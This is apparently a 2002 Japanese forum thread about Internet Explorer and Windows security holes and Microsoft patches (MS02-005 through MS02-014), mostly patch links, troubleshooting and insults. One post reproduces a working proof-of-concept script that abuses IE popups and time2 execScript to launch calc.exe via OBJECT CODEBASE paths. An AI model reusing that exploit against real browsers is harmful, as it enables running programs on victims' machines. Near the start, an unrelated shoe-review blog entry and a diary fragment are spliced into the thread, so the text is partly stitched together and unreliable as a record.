確かにQ316059のみ。

やらなければよかった。腹立つ。

ええーっと。
1）SystemフォルダからVbscript.dllをどこかに移動させるのと
2）フォルダオプション→ファイルの種類→VBScript Script Fileを削除

どっちがとりあえず（その場しのぎのテクニックとして）、いいんだろうか？

updateの重要な更新とIEのパッチは違うものですか？

>>210
当てる内容は同じだけど方法が違うだけかと。

>>210
Windows Update使う前にTecnetから拾っちゃうから、知らない。
今度はWindows Updateから拾って試してみるよ。

重要な更新・・・OSのセキュリティ改善
IEパッチ・・・IE自体のセキュリティ改善

じゃないんですか？

３／１（金）　オールデンのＵーチップ

今日は、コンフォートなコードヴァンの靴を履きたくなり、久しぶりにＵーチップをセレクトしました。
丸みを帯びていて、楽な履き心地なので、長時間履いていても全く疲れません。
この靴は、フランス旅行にも何回か履いて行きましたが、足にピッタリではなくむしろ余裕のある履き心地なので足に優しい靴です。
とにかく、とても心地良いのです。
さらには、汎用性のあるＵーチップですし、プランテーションクレープソールと呼ばれるラバーソールなので、使い回しも楽です。
また、コードヴァンの鈍い輝きは、この靴をとてもこだわりのある存在に高めてもいます。
Ｕ型のステッチ部分の輝きと、コードヴァン特有の履き皺が、何ともいえない良い雰囲気なのです。
雨跡が残って回復に手間と時間のかかるコードヴァンですが、買った当時は天候にかまわず履いてきました。
黒はオールデンのコードヴァンとこだわっていた時期に買ったので、Ｊ．Ｍ．ウェストンのゴルフの代役とも考えていたのです。
（もちろん、靴が揃った最近は、最初から雨の場合はさすがに履かなくなりました。）
デザイン的にも、トゥが盛り上がったようにも見えて、ボリュームあるデザインですが、嫌味はなく、全体コーディネートの中では程よいアクセントにもなります。
特に、ジーンズ、綿パンなどのラフなボトムズとの相性は、とてもいいです。
アメリカでは売っていないとのことですので、日本で買うオールデンの靴としては、ベターな靴と思います。

ここってつまんねー所だな、カキコがすくね〜しよ

>>213
同じものだったりする。
でもたまに、Windows Updateに載るのが数日遅かったりする。

>>216
なるほど当てるときはどっちかでいいと

>>217
最近気になるんだけど。
Windows Updateってパッチの順番とか、ちゃんと見てくれてるのかな？
そうならWindows Updateの方がいいんだろうけど。
誰か知らないかな〜

普段はオペラ使ってるんだけど、たまにジャパスクリプトのぺえじ見るため
ＩＥを開いたりする。
そーすっと、ノートン先生がレッドカード出す。
見ると、バックドアトロイの木馬がやってきてたぞ、というレポート。
ＩＥはまめにパッチあててるのにぃ。。。。

みんなおかしい
2002年3月1日(金) 晴れ
今日は既に午前様なので早々に終わりますが一言。
しんのすけさん、やそすけさん、今日は一体どうしたんですか？

致命的欠陥が判明

http://archives.neohapsis.com/archives/bugtraq/2002-02/0354.html

任意のコマンドが実行できてしまいます。HDDのフォーマットも可能です。

パッチが出来るまで、IE使わない方が無難です。

http://security.greymagic.com/adv/gm001-ie/simplebind.html

にアクセスするだけで、c:/winnt/system32/calc.exe が起動するよ。

>>221
実行可能ファイルにコマンドライン引数を渡せないから、
HDDのフォーマットもウィルスを仕込むこともできないよ。
高性能なブラクラに利用できるくらいで、極めて安全。

>>222
例えばdataアトリビュート指定するとそっからダウンロード試みているようだ。
極めて安全はいいすぎ。

ＩＥ６．５が、出そげ。

ニュースリリース
弊社の販売しているPCに搭載していたMSのIEですが、あまりの問題の多さに弊社も辟易しました。
この度、ユーザの皆様にはとてもお勧めできるものではないと弊社は判断いたしましたので、
IE以外のブラウザをお使いください。

>>225
/.jpからのコピペ

【新たなセキュリティホール発覚】
この事実、どう説明してくれる！　ＭＳ！！
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2002/03.html#20020301_ie
>IE 5.5 SP2 / 6、OutlookExpress 5.5 / 6 に超巨大な弱点。
>アクティブスクリプトおよび ActiveX を無効にした場合においても、
>悪意ある web サイトや HTML メール送信者が任意のコマンドを実行可能。
>回避方法はない。Microsoft から fix が提供されるまで、IE 5.5 / 6 を使わず
>Netscape 6 や Opera 6 などを利用すること。

>>227
せめて表示されてる分だけでも読んでから書いてくれ。

大発見をしたと思って急いで書き込んだんだろうな

余りに無様

充分に大した弱点だが何か？

ヤフーオークションで、凄い人気商品、発見！！！

「 TBC-7 」がパワーアップした
「 TBC-7S 」↓
http://page2.auctions.yahoo.co.jp/jp/auction/b21029050

ヤフーオークション内では、現在、このオークション
の話題で、持ちきりです。

IE6のService Pack1ってあるの？

無無

>>231 大した弱点かどうかは問題ではない。カキコの基本。

>>233
立て続けに脆弱性が見つかりいちいち対処しなくちゃならないため
いつまでたっても腰すえてまとめる事が出来ないと思われ。

質問。
みんなVisual Basic ScriptとWindows Scripting Hostをはずしているよね、当然。
他にもチェックする項目ってあるかな？

サポセンに「修正プログラムが、インスト出来ないのですが…」と、問い合わせ
した所「セキュリティソフト導入して置けば、問題ないですよ」と言われた…
いいのか…？

マイクロソフト（株）は22日、
“Internet Explorer の不正な VBScript 処理により Web ページがローカルファイルを読み取る”
というセキュリティ問題の修正プログラムを公開した。
対象となるのは、Internet Exploerer 5.01/5.5/6で、
同社ではこの問題の危険性を“高”レベルに設定して警戒を呼びかけている。

http://www.forest.impress.co.jp/article/2002/02/22/iepatch.html
http://www.microsoft.com/japan/technet/security/bulletin/MS02-009ov.asp

>>237
はずしてない

>237
そこまでして使わなくてはならないもんなんだろか。

オペラとネスケを使い分ければいいような。

>>235
(ﾟдﾟ)ﾊｧ?
bugtraq archives
http://archives.neohapsis.com/archives/bugtraq/2002-02/0354.html 見ろや

ここ↓のデモやったら血の気が引くぞ
http://security.greymagic.com/adv/gm001-ie/
最新パッチ当ててようが何してようが、Webを見ただけ、HTMLメールを表示しただけで
HDフォーマットから何でもありあり。
使い続けるのはあんたの勝手だけどさ。

>>242
http://pc.2ch.net/test/read.cgi/sec/1005605775/221-223
くらい読んでから書け。つーか素人はROMってろ。ウザイ

>>242
ばか

>>242
ネタだと思ったら真性だったのか
過去ログを一通り読んでから書き込むってーのは初心者以前の常識だと思うが・・・

で、結局これを悪用されたとするとどんなシナリオが考えられるんだろう？

まぁそんなに虐めてやるなよ
素人がちょっとはしゃいでしまっただけだろ

>>246
別にたいしたことは起きない

つーか有る意味自業自得？

>>248
なにが？

悪用されてひっかかる

>>246
242の血の気を引かせる (w

誰か
C:\Program Files\Adobe\Photoshop 6.0\Photoshp.exe
を仕込んでみて。起動時間かかりまくり。

ココで、こんなの対したことないって言っている奴らって
セキュリティに、とことん知識がないか　関心がない奴らなんだろうなぁ
もし、少しでそ知識or関心があれば
このセキュリティホールの恐ろしさが、イヤでも判るもんだが・・・

俺のＵＧ専用マシンには個人情報はかけらも存在しないけど・・・。

>>252 == >>242
誰に騙されたか知らんが、HDDフォーマットし放題とやらのソース出してみろ。
所詮、素人の妄想なのでだせるはずもないだろうが。

>>254
スクリプトだけならできないだろうけど、
ActiveX利用されたらどうだろうか？

てゆーか、IE以外を使える人はとうに使ってると思われ。
せきゅりていに関心がある人自体が少数だし。
世間的には「大事なデータのバックアップがあれば平気」ていどの認識だろう。
その大部分は「スクリプトって何？」というレベルだし。議論しても無駄。

http://slashdot.jp/article.pl?sid=02/03/02/0236229&mode=thread
参考になるかどうかはわからんけど。

つか、どの程度のことができるかは知らないけど、オフにしてても
スクリプトを実行されるとしたら、どのみちあまり好ましいことでは
ないのでは。いまさらこの程度の穴では驚かないということなのかも
知れないけど。

>>257
その記事の内容は間違ってるよ。
大手のサイトの記事だからといって、過信しない方がいい。

>>252
負け惜しみかよ
ﾀﾞﾎﾞがッ！

知ったか素人は無様だね

この程度は穴でもなんでもないよ。

つーかさ
HDD初期化されるのがそんなに怖いことなのか？
30分も有れば完全に復帰できるだろ？
まぁそんなことは起こりようがないが・・・

自作自演スレはここですか？

みんな俺を信じろって。安全だから。

>>260
激しく同意。フォーマットされてもエロ画像消えるぐらいだろ？(w

まあ、素人はせいぜいびびってなさいってこった。

＞２６４
おまえら、ブタオタもウザイがな（藁
社会的不適各のブタヒッキーが

>>265
意味不明
つーか煽り下手。TPOを考えよう

>>265
漢字の書き取りも出来ないガキに指摘されなくても、俺らが社会的に不適格という事は認識してるよ。

書き込みが増えたら糞スレになったな…

まぁ227の厨のせいだけどな

ﾅﾝﾁｬｸﾝだし

俺はこれからも安心してＩＥでアングラサイトいきまくるＹＯ！

>>270
エロ画像消えるぞ(藁

トラップを使って>>227のパソコンに、
あるものを仕掛けました。

HD 初期化は（間違いらしいけど）例として挙げてるだけじゃない？
バックドアを仕掛けられるとか踏み台にされるとかの心配はないのかな。
あとこれを利用して、本来なら防げるはずのワームにやられるとか。
教えて、えらい人。

動かしてないはずのIISが動いてるかも知れんなぁ。

このパソコンはネット専用だし98だし

それほど問題視してないよ

>>273
そーゆー危険なことはできません。

悪意ある272の頭の中に重大なセキュリティホールを発見！

あーなんか糞スレになってる。
おいらが>>227くんに「激しくｷｼｭﾂですよ」って
親切に教えてあげればよかったよ。ごめんね。

まぁたいして変わらんよ

ﾔｼも弄られて本望だろうし

制限ユーザーで使ってるので問題なし。デモも動かず。

ＩＥ５．５だけど、ＩＥ６にしない方が良いみたいですね〜
付録待ちだったけど、付かないみたいだし…

2002 年 2 月 11 日 Internet Explorer の累積的な修正プログラム (MS02-005)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-005

XMLHTTP コントロールにより、ローカル ファイルにアクセスすることができる (MS02-008)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-008

Internet Explorer の不正な VBScript 処理により Web ページがローカル ファイルを読み取る (MS02-009)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-009

>>281
６の方がまだ安全

まぁ好きにすればいいが

で、結局たいしたセキュリティホールじゃないのか。
引数を与えられないからCドライブをフォーマットなんてことはできないのね。

んー、でも、パスが既知のuninstaller.exeを起動ぐらいだったらできるよね。

なるほど・・・
面白いかも。
htmlメールをoutlookで開いた瞬間にアンインストールなんてことが可能なワケね。

だからActiveXコントロールをダウンロードさせればなんでもありだっつうの。
MSの工作員でも紛れこんでんのか?

あの〜、282のパッチは順番通りに入れないとまずいんでしょうか？
過去記事読むとうまくインストール出来ない方とかいるようなのですが…。
数字が小さい順に入れるのが(005→008→009)基本ですか？

道理で最近HDDへのアクセスが多かった訳か

MSXML4かわからんからMSXML入れて修正パッチ入れるか

しかし大半はネタだろうが、もしかしてマジびびってるﾔｼも中にはいるのだろうか？
初心者は別として

>>288 数字が小さい順(パッチのリリースが古い順）に入れる。

290の方法でもやっておけば大丈夫

>>287
だからどうやってダウンロードさせるの？
はじめから任意のActiveXのダウンロード実行できる環境なら
こんなセキュリティホール無くても、元々なんでもできるでしょ？

回避方法が追加されたみたい
http://memo.st.ryukoku.ac.jp/archive/200203.month/3105.html

>>281
OCNのCD-ROMに、付録で6.0は去年から付いているが。

>>296
それはOCNに請求しないと駄目なのか？

<script id="scr1">
var oPopup = window.createPopup();
var oPopBody = oPopup.document.body;
oPopBody.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="c:/windows/calc.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111
-111111111111" CODEBASE="c:/winnt/system32/calc.exe"></OBJECT><OBJECT NAME="X" CLASSID="CLSID:
11111111-1111-1111-1111-111111111111" CODEBASE="c:/windows/system32/calc.exe"></OBJECT>';
oPopup.show(290, 190, 200, 200, document.body);
</script>


<noscript>
<xml:namespace prefix="t" />
<?import namespace="t" implementation="#default#time2" />
<t:set id="set1" to="" attributeName="document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML" />
</noscript>

>>297
淀橋や山田に行きゃある。

IE使いって脳死してるのか？

脳死常態の奴はIEすら使えませんがな

きさまーーーーーーーーーー

>>296 OCNに配布許可だすなら、雑誌にも許可してあげればいいのに。M$のバカめ。

ODNにも、付いてたよ〜
付属の用紙に、インストしたら直にアプデートして下さいと書いてあった。

>>304　IEの画面のどこかにプロバイダの表示が入ってない？

>>296 OCNってBadtrans撒き散らし率高いなって思ってたら、
ISPがIEを配布してるのか〜。パッチ当てまできちんと指導してくれ。

Java アプレットがブラウザ トラフィックをリダイレクトする
http://www.microsoft.com/japan/technet/security/bulletin/ms02-013ov.asp
この問題により、ブラウザで送受信される情報を盗聴されることがございます。

>>307
別に、盗まれたっていいじゃん

>>307
さっそくパッチ当てたがパッチというよりは最新のMicrosoft virtual machine
だね。5MBもある。

>281
むしろIE5.01SP2の方が安全かも

>>310 Win2000しか最新パッチでてないけどね。

今日ヨドバシ行ってOCNの入会案内貰って来たけど、
IE6入ってるね。

IE6にアップデートしてバッチｑ３１３６７５をいれた所
とにかくフリーズする回数が増えてしまいました。
何故でしょう？

>>313 メモリ足りてる？

http://www.microsoft.com/japan/technet/security/current.asp?url=/japan/technet/security/frame_prekb.asp?sec_cd=MS02-008
ここ見て調べて見たらmsxml3.dllだった。でもこのヴァージョンのパッチは
準備中になってる、駄目じゃん。

IE6はMSXML3.0のようだね
http://www.keiyu.com/doc/msxml.htm

>>313
q316059.exeも入れよう

2002 年 2 月 11 日 Internet Explorer の累積的な修正プログラム (MS02-005)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-005

XMLHTTP コントロールにより、ローカル ファイルにアクセスすることができる (MS02-008)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-008

Internet Explorer の不正な VBScript 処理により Web ページがローカル ファイルを読み取る (MS02-009)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-009

>>307 Java アプレットがブラウザ トラフィックをリダイレクトする（MS02-013）
http://www.microsoft.com/japan/technet/security/bulletin/ms02-013ov.asp
参考記事として
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020305/1/ を追加しておきます。

MSXML3.0の場合はMSXML4.0にヴァージョンアップしても
問題ないんだろか？

メモリーは足りてるんです。
３１７さん　３１８さん　ありがとう。
３１６０５９いれてみます。

早く、IE6SP1を・・・・泣

最近ＩＥ６が、よく故障するのですよ。
修復するけど、故障の原因ってなんでしょうね？

>>319
俺はバージョンアップした
英語版しかないらしい

MSXML4.0の日本語版
http://www.microsoft.com/downloads/release.asp?releaseid=33910
のmsxmlJPN.msi - 4,972 Kb
MSXML 4.0 RTM 日本語版のダウンロードでは 3 つのオプションがあります。
http://www.microsoft.com/japan/developer/xml/downloads/msxml4.asp

Microsoft Windows 2000 Service Pack 3
はよ出さんかい

>>321
毎月のように発見される脆弱性と
その対処に追われてサービスパックどころじゃないでしょ。

>>323
日本語版
ttp://microsoft.com/japan/enable/products/security/proglist.asp?prod=032&info=13

IE5.5SP2にしたけど修正プログラムって何いれればいいの？

>>328
そりゃもちろんネギ

IE5.01SP3を出してくれないかなー。
防御しようのない穴があるのにそのパッチが出てないなんて
精神衛生上悪いよ。

ゲイツは日本に来てる暇があったら徹夜でプログラム考えろ。

こんにちは。使用OSは、Win98(SP1？)です。
IE6を使っていて、最新のパッチ入れてからだと思うんですが
あるサイトのBBSへの書きこみの際エラーが出たり、
Amazon.co.jpで届け先と請求先の変更と登録が出来ません。

ちゃんとamazonアカウントサービスにもログイン出来ますし、
cookieは完璧有効にしてあるので、買い物かごも正常に動いています。

SSLも機能してます。メールアドレスやパスワードの変更は余裕ですし
届け先と請求先の削除は何故か出来ます。なのに、登録と変更だけが出来ません。

そんなわけで、今日発売の小野リサのベスト盤が買えません（T_T)
これは、やはりX箱のせいですか？それとも、無能な私のせいでしょうか？

>>330 ゲイツはプログラム組まんだろ、
もう年だしとてもそんな能力はない。
彼の仕事は、デカイ液晶プロジェクト画面に
自分のニヤケ顔を映すことだよ。

http://microsoft.com/japan/technet/security/current.asp?url=
/japan/technet/security/frame_prekb.asp?sec_cd=MS02-013

なんだか急に最近IE＋CuamでのWeb閲覧・http DLの速度が
遅くなってきました。たとえばグーグルとかの軽いページでも
表示するのに１０秒以上、大体２０秒前後かかります。
前はけっこう一瞬だったような気がするのですが。
接続環境はADSL 1.5Mです。実効速度も1.3M出ています。
つか、他のブラウザ、たとえばOpera だともう２秒くらいです。
関係あるのか無いのかわかりませんがNN6でも遅いです。

IE Version: 6.0.2600.0000
更新バージョン: Q313675; Q316059

OS W2K 5.00.2195 SP2

です。同じような症状の方いらっしゃいますか？

>>334
SRP1は?(ﾌﾟ

キャッシュ消したら〜?

＞３３５
あ、書き忘れましたがそれも当てました。
キャッシュも消しました。クッキーも。

やっぱり異常な事態なのですね。うーむ。

2002 年 2 月 11 日 Internet Explorer の累積的な修正プログラム (MS02-005)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-005

XMLHTTP コントロールにより、ローカル ファイルにアクセスすることができる (MS02-008)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-008

Internet Explorer の不正な VBScript 処理により Web ページがローカル ファイルを読み取る (MS02-009)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-009

>>307 Java アプレットがブラウザ トラフィックをリダイレクトする（MS02-013）
http://www.microsoft.com/japan/technet/security/bulletin/ms02-013ov.asp
参考記事として
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020305/1/ を追加しておきます。

MSXML4.0(msxmlJPN.msi)をインストールしようとしたら、windows installerの
新しいヴァージョンでないとインストール出来ませんって出た。
windows installerに新しいヴァージョンなんてあるの？

昨日から、ＩＥを開こうとすると、
一応アドレス先にはアクセスしてるようなのですが
表示するまえに
「問題が発生したため、microsoft internet explorer を終了します。
ご不便をおかけして申し訳ありません。」
というウィンドウが出てきて、ｗｅｂ観覧が出来ません。
エラー報告を送信して、ブラウザの再起動をしても直りません・・・
そこで、ネスケをインストールしてみましたが
同じようなエラーが出てダメです。

ＩＥの再インストール、ＯＳ再インストールしてもダメ

どうすればいいでしょうか？
ほんとよろしくお願いします。

環境は、ｗｉｎｍｅ　ＩＥ6　です

>>340
WinMeだったらOS再インストールの前にシステムの復元を試してみるべきでしたね。
しかし、OS再インストールでもダメ？クリーンインストールした？

>>341
再インストールのまえに、システムの復元もしてみたけど同じでした。
クリーンインストールじゃなくて、ただの再インストールっす。
出来れば、クリーンインストールしたくないっす・・あぁ

>>334です。試しに今LANで繋いでる他のマシンからアクセスしたら
やはり全然速いです。ただそのマシンはIE5.01です。
もしかしてIE6の方が表示が遅いとか、そういうことって･･･
無いですかやっぱり。

なんでWin2000だけHotFixが必要でMeやXPは普通のでいいん?

CPUとかメモリによるし、インストールしている他のアプリケーションなど
も関係してくる。ぎりぎりの状態ならIE5.01とIE6.0のちょっとの差が影響
することもある。基本的には、常駐ソフト見直す、デスクトップにショート
カットを不必要に置かない、メモリを増やすなどで解消。古いPenII機でも
IE6はさくさく動く。デフラグもやってみてね。ていうかセキュリティと関
係ないよね。

>>345
単に遅いというのならまだいいのですが
もしかして何か変なプログラムが陰で動いていて
そのしわ寄せで･･･とか思ってしまって。

IEだけが･･･というのが不思議です。

>>346 パッチ当ててからデフラグやってないだけの話とちゃうんかい

>>347
そう言えばデフラグやってませんでした。
で、今やってみました。が、状況は変わりません (ToT)

opera と比較すると10倍以上、いやもっと遅いです。
で、どういうわけかNNだと立ち上げてすぐには
ページがうまく開けません。URL欄に打ち込んで、
４,5回エンターを押して、やっと表示されるかんじです。
でもそうやって表示されはじめてしまえば、軽く
表示してくれます。IEよりは全然速いです。

気持ち悪いです。。

>>348 ウィルスチェックはやったの？　アンチウィルスソフト持ってなかったら
すぐに買いに行こう。アンチウィルスないといつまでも不安が残るぞ。

>>349
NIS2001はあります。完全スキャンやってみるべきですか。

てか、Norton protection update とかいうやつが更新出来ないんで
そのままになってますが･･･。あと、だいぶ前からですけど
完全スキャンをして、ウィルス無し、という結果が出たにも関わらず
メニュー表示が完全スキャンが×印のまま、という不具合が。。

この際NIS2002を買って新規インストールすべきでしょうか？

>>350
NIS2001でも金払えばファイル更新できるはず。期限切れなら当然更新できない。
http://www.symantec.com/region/jp/support/virwall/index.html
IEとNNのどっちを既定のブラウザにしてるの？その辺の関係で設定がおかしくなってる可能性がある。

>>351
いえ、期限切れではないです。他のウィルス定義とかは
ちゃんとDL出来てますし。なんかバグッぽいかんじで
そのNorton protection updateだけが毎回インストールに
失敗するんです。

で、既定のブラウザはCuamにしてます。
Cuam の設定のとこにCuamをデフォルトのブラウザにする
という項目があったのですが、それではうまくいかないので
手動で強引に html に関連付けしてしまいました。

>>352 それじゃあIEの問題ではなさそうですね。関連付けがおかしくなってるのかも。
そんなにブラウザいっぱい入れて不安定なシステムで、一般的にIE6が重いって言っち
ゃあだめよ。セキュリティに関係なさそうなのでこの辺で。

じゃウィルススキャンしてOKならとりあえず
セキュリティ的には安心していいのですね。
それならまあ一安心です。
どうもありがとうございました。

2002 年 2 月 11 日 Internet Explorer の累積的な修正プログラム (MS02-005)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-005

XMLHTTP コントロールにより、ローカル ファイルにアクセスすることができる (MS02-008)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-008

Internet Explorer の不正な VBScript 処理により Web ページがローカル ファイルを読み取る (MS02-009)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-009

>>307 Java アプレットがブラウザ トラフィックをリダイレクトする（MS02-013）
http://www.microsoft.com/japan/technet/security/bulletin/ms02-013ov.asp
参考記事として
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020305/1/ を追加しておきます。

IT Proの「IEを使い続けるための“お勧め”設定」って記事…


「1. IE のインターネット・オプションの「セキュリティ設定」において，インター
ネット・ゾーンとイ ントラネット・ゾーンの「ActiveX コントロールとプラグイン」の
項は，すべて無効にする
2. 同様に，「Microsoft VM」と「スクリプト」の項もすべて無効にする
3. IEのインターネット・オプションの「詳細設定」において，「マルチメディア」の
項の「Web ページのアニメーションを再生する」「Web ページのサウンドを再生する」
「Web ページ のビデオを再生する」のチェックをすべて外す

もちろん，現在公開されているIEのセキュリティ・パッチをすべて適用することが
前提条件だ。」


何らかの事情でここまでしてIEを使いつづけなけりゃならない人たちってのは
本当に気の毒だよなあと思った（藁

ActiveXやスクリプト関係は別にIEだけが危険なわけじゃないぞ。
他のブラウザでONにしたままエロサイト行ってみろ。

>IE5.5SP2にしたけど修正プログラムって何いれればいいの？

Microsoft Windows Updateへいって左上[製品の更新]から右上[ダウンロード]
クリック。
串を使っているなら>355の下から２つ目のをダウンロードしてエクスプローラー
などで実行しよう。

ネスケだってまともに使うにはJavaScriptやらCSSやら
ダイナミックフォントやらプラグインやらJavaアプレット
やら全部無効にする必要あるだろ。
そこまでしてネスケにしがみつかなきゃならない人たちってのは
本当に気の毒だね(藁

age

ネスケやオペラはしがみつく価値なし。

NetscapeやSunの「JVM」に「盗み見」のセキュリティホール
■URL
http://home.netscape.com/security/
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/216&type=0&nav=sec.sba
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-013

　米Netscape Communicationsは同社のセキュリティ情報サイトで、
米Sun Microsystemsの「Java Virtual Machine」(JVM)と、
Webブラウザー用の「JVM plug-in」にセキュリティホールが見つかったと警告した。

　これは、米Microsoftが4日に報告したJVMのセキュリティホールと同様の問題で、
攻撃者がJavaアプレットを使って、Webブラウザーとプロキシーサーバーとの通信を盗聴可能になるというもの。
これを悪用して、ユーザー名やパスワードなどの機密情報を盗聴される危険性がある。

誰かネスケコンポーネントのタブブラウザ作ってくれないかな。
IEがこのていたらくだから、金払ってもいいからさ。

>>363
使ったことないから使い勝手は分からないけどこんなものもある。
Collector　−　IEとNetscapeをタブ切り替え型Webブラウザーにするソフト
http://www.forest.impress.co.jp/library/collector.html

ネスケは知らんがmoziilaはタブサポートしているＹＯ！

MS02-008のMicrosoft XML Core Services 2.6と3.0の日本語版修正プログラム
はいつになったら出るんじゃい！
IE6.0SP1も早く出せ！

セキュリティ警告のメール、URL以外は?????????????の羅列のがきたよ。

>367
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-014ov.asp

IEなどではなく、Windowsのシェルに関するセキュリティホールです。
インターネットに繋ぐだけで危険です。

悪意のあるユーザーが、未チェックのバッファを利用して
任意のプログラムを実行することが可能です。
対策が行われていないシステムがインターネットなどのネットワークを
通じて他のコンピュータと接続している場合、
この問題を利用した悪影響を受けることがあります。
この攻撃は、ハッカーまたはクラッカーと呼ばれる悪意のあるユーザーや、
ワームといった自動的な攻撃を目的とした悪意のあるプログラムから
行われることがあります。
上記の攻撃を受けることにより以下のような実害を受ける可能性があります。

* 新しいソフトウェアのインストール (通常は悪意のあるプログラム)
* ハードディスクのフォーマット
* 他のシステムを攻撃するための利用
* Windows の異常停止

>368
ルータやProxy経由なら大丈夫か？

注意:この修正プログラムは、Internet Explorer 4.0 の アクティブデスクトップを利用している方のみ適用してください。

>>370
＞Windows NT 4.0(アクティブデスクトップを使用していない環境用)、
＞Windows 98 および Windows 98 Second Edition の
＞日本語版修正モジュールは、現在準備中です。
＞準備ができ次第、このページにて、お知らせします。
準備できてないだけ

>対策が行われていないシステムがインターネットなどのネットワークを通じて他の
>コンピュータと接続している場合、この問題を利用した悪影響を受けることがあり
>ます。

んん？　これってWindows使っててネットにつなぐだけでやばいってことじゃあないの？
超特大のセキュリティホール？

アナばっかだな、どんだけパッチを入れればいいんだよ

対策って？
ポートを閉じてればＯＫ？

ネスケ他のブラウザだって狙われればIE以上にゴロゴロと穴が見つかる。

そうかしら？




とか言ってみるテスト

google ヒット件数
ブラウザ名を明示するため予め"web"+"browser"付加、
前者は"vulnerability"後者は"remote"+"exploit"
Netscape Navigator 約4810+約3910
Netscape Comunicator 約3500+約2150
Mozilla 約2840+約1700
Mosaic 約947+約1770
w3m 約320+約186
Opera 約2800+約1890
Internet Explorer 約16200+約8360

Netscape Comunicator ×
Netscape Communicator ○

そもそもマイクロソフトのプログラマが欠陥ばかりつくるタコだとは思えない








と言ってみるてすと








…ていうか、「IE=欠陥ブラウザという認識は大きな間違い」てのが常識ですが。








と、今さら正論かましてみるてすとのてすと

IEはジャイアンツのようなもんですな

IEなどではなく、Windowsのシェルに関するセキュリティホールです。
インターネットに繋ぐだけで危険です。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-014ov.asp

Microsoft Windows 98 が出た！！
http://download.microsoft.com/download/ie4095/actdesk/4.01_sp2/W9XNT4/JA/q313829.exe

>>381
Win98なんだけどパッチ当てたら、
ディスクのプロパティで文字化けするようになったよ。
べつにいいけどね。

なんか糞を握らされた気分。

Meは大丈夫なの?

>>382

あああ！！！ほんとだぁーー！！！
マジやばいっす！！！

>>382
うーむ。試しに弟のパソでやったら凄いことになった。自分のに当てるのは
ちょっとやめとこう。

後は、気づかれないうちに、明日実家から引き上げることを考えるか…。

＞３８５
ひでえなオイ！

日本語の詳細情報がまだ出ていないので、英語版を見てみた。
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-014.asp

今のところ問題があるのはWindows 98, 98SE, Windows NT 4.0, Windows 2000で、
Windows MeとWindows XPにはこの問題はないそうだ。

「ファイル名を指定して実行」も文字化けしてるよ（ｗ
文字化けだけで済んでくれたらいいけど。

くっそー、人柱になっちまった！！

今初めてMeであることに感謝した

âge

とりあえずMS02-014の新しい修正パッチが出るまで見送りだな。

02-014パッチ出たよ

>>385はある種、勇者だな

日本語でも詳細情報が出てる。
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-014
「Windows Shell の未チェックのバッファにより、コードが実行される」 (MS02-014)

パッチの不具合のことは書いてない。

ＩＥなどという、明日無きブラウザを期待している皆さんも
そうでもない皆さんも
たまには、息抜きで善行でもどうですか？

2ちゃんねらーの力で子供達を救おうよ（連日連夜　祭り開催中!）
何処の板から来たかを明記してくれると、みんなのやる気が上がります!
【ｸﾘｯｸ】 押してみっかな【ｸﾘｯｸ】
http://live.2ch.net/test/read.cgi/festival/1015502074/l50
これを見て少しでも協力する気になった人
この文を色々な板にコピペしてくれると助かります

顔も知らないどこかの誰かを助けることよりも自分のパソコン守ることの
ほうが大切…








…とか言ってみるドメスト。

＞ＩＥなどという、明日無きブラウザを期待している皆さんも

違うエンジンのブラウザって、ネスケ、もじら、オペラくらいしか
知らない。どれ使ってるの〜？
もうIEやめよっかなと思ってる…。

[ファイル名を指定して実行]も文字化(;_;)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-014
http://download.microsoft.com/download/ie4095/actdesk/4.01_sp2/W9XNT4/JA/q313829.exe

不具合を解消する為のパッチなのに
パッチを当てたら　文字化けという不具合が生まれちまったじゃねえかよ　ヽ(`Д´)ﾉ
きちんと　日本語版パッチを当てたら元に戻るんだろうな！

つーか　英語版パッチでも　
一応、穴は埋まった事になるのか？

MD5やCRCチェックで弾かれる、普通

うぁ〜　なんだこの文字化け..............

このスレ読むまで気づかなかった　鬱

やぱりそうか・・
文字化けしてるよな
テメー　ふざけんな！　なんとかせんかい！
ったく　役所以下のデクノボー集団がよ

ｱﾌｫがいるな

MS02-014のパッチを当てても文字化けしてない人はいる？
（XP,Meは除く）

知らずにパッチをあてて見事に文字化けしてしまいました。(win98)
誰か文字化けを直す方法を教えてください。
日本語版のパッチを上からあてればよいのでせうか？

悲しいです。

パッチを当てられたアプリを洗い出してオリジナルを上書きだろうな
で、またパッチを当てる

ふっ、ごくろうさん

>>404
win98だけど、ぜんぜん化けないよ。

文字バケスレ立ててもうた

(1) Windows\Option\Cabs の中の Win98_xx.cab (xx は Windows 98,
Windows 98 SE ともに 50 のあたりと思われる）から Shell32.dll
を抽出する。

(2) Dos モードにして Windows\System ディレクトリの同名ファイルに
上書きする。

文字化けは以上で直ります。

>>408
勇者だな

